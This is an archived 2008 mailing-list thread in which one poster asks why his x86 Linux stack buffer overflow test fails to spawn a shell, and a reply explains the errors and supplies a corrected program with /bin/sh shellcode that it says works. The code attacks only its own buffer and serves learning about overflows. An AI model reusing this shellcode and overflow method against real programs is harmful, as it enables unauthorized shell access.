>>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>
>> #endif
>>
>> char large_string[128];
>> int main() {
>>   char buffer[96];
>>   int i;
>>   long *long_ptr = (long *) large_string;
>>   memset(&buffer,0,sizeof(buffer));
>>
>>   for (i = 0; i < 32; i++)
>>     *(long_ptr + i) =  (long)&buffer;
>>
>>   for (i = 0; i < strlen(shellcode); i++)
>>     large_string[i] = shellcode[i];
>>
>>   strcpy(buffer,large_string);
>> }
>>
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>> &#0;
>>
>>     
>
>   



* Re: buffer overflow
From: nai.xia @ 2008-03-17  8:28 UTC (permalink / raw)
  To: linux-c-programming

----- Forwarded message from nai.xia@gmail.com -----

Date: Mon, 17 Mar 2008 16:19:40 +0800
From: nai.xia@gmail.com
Subject: Re: buffer overflow
To: Varun Chandramohan <varunc@linux.vnet.ibm.com>

I think there are three errors in your testing program. 


On Tue, Mar 11, 2008 at 11:38:38AM +0530, Varun Chandramohan wrote:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";

I disassembled the shellcode and I don't think it is valid.

> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];

The string is not _large_ enough. On my Linux box it takes about 132 bytes
from buffer to the return address, which means you filled part of the stack with
the junk bytes after large_string+127 instead of &buffer.

> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
> }

The return behaviour of "main" is somewhat different from that of other plain
functions. Below is an excerpt taken from my program.


 804846f:	e8 cc fe ff ff       	call   8048340 <strcpy@plt>
 8048474:	83 ec 80             	sub    $0xffffff80,%esp
 8048477:	59                   	pop    %ecx
 8048478:	5b                   	pop    %ebx
 8048479:	5d                   	pop    %ebp
 804847a:	8d 61 fc             	lea    -0x4(%ecx),%esp
 804847d:	c3                   	ret    

We can see that it is not a direct "pop" of the stack:
the stack pointer is adjusted with "lea" just before the "ret",
so your shellcode address ends up in "esp" rather than "eip"!

And finally, here is my modified version (which successfully got a shell on my box)
of your test program:



#include <stdio.h>
#include <string.h>

/*
 * Replacement payload the reply says it used; opaque bytes here apart from
 * the embedded path fragments. foo() measures it with strlen(), so the
 * copy stops at the first \x00 (this variant has none before its
 * terminator).
 */
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
/* Compiled out; carried over unchanged from the original post. */
#if 0
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

#endif

/* 256-byte staging array (doubled from the original 128); foo() overwrites
 * every byte of it before treating it as a C string. */
char large_string[256];
/*
 * Same construction as the original main(), moved into its own function
 * (the disassembly discussion above explains why) and using a 256-byte
 * staging array. It still relies on the same undefined behaviour, so the
 * "works in my box" result is specific to the author's compiler, flags
 * and hardening settings.
 */
int foo() {
  char buffer[96];
  int i;
  /* char array punned as long[]: alignment / strict-aliasing UB. */
  long *long_ptr = (long *) large_string;
  /* &buffer is char (*)[96], the same address as buffer but the wrong
   * type; memset(buffer, ...) is the conventional spelling. */
  memset(&buffer,0,sizeof(buffer));

  /* 256/4 hard-codes sizeof(long) == 4: on ILP32 it fills all 256 bytes
   * and leaves no NUL terminator; on LP64 it writes 256 bytes past the
   * end of large_string. */
  for (i = 0; i < 256/4; i++)
    *(long_ptr + i) =  (long)&buffer;

  /* Overlays the payload bytes (without their terminator) on the front of
   * the array; int vs size_t comparison as in the original. */
  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  /* Unbounded copy of 256+ bytes into a 96-byte stack array: the
   * out-of-bounds write, and also an out-of-bounds read of large_string
   * since the loop above left no NUL inside it. */
  strcpy(buffer,large_string);
  /* Declared int but never returns a value; main() discards the result,
   * so no UB from that alone, but -Wreturn-type will flag it. */
}

/* Wrapper so that the overflow happens in a frame other than main()'s
 * (see the lea/ret epilogue discussed above); foo()'s never-set return
 * value is discarded. No return statement: 0 under C99, unspecified
 * under C89. */
int main()
{
	foo();
}




> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

----- End forwarded message -----

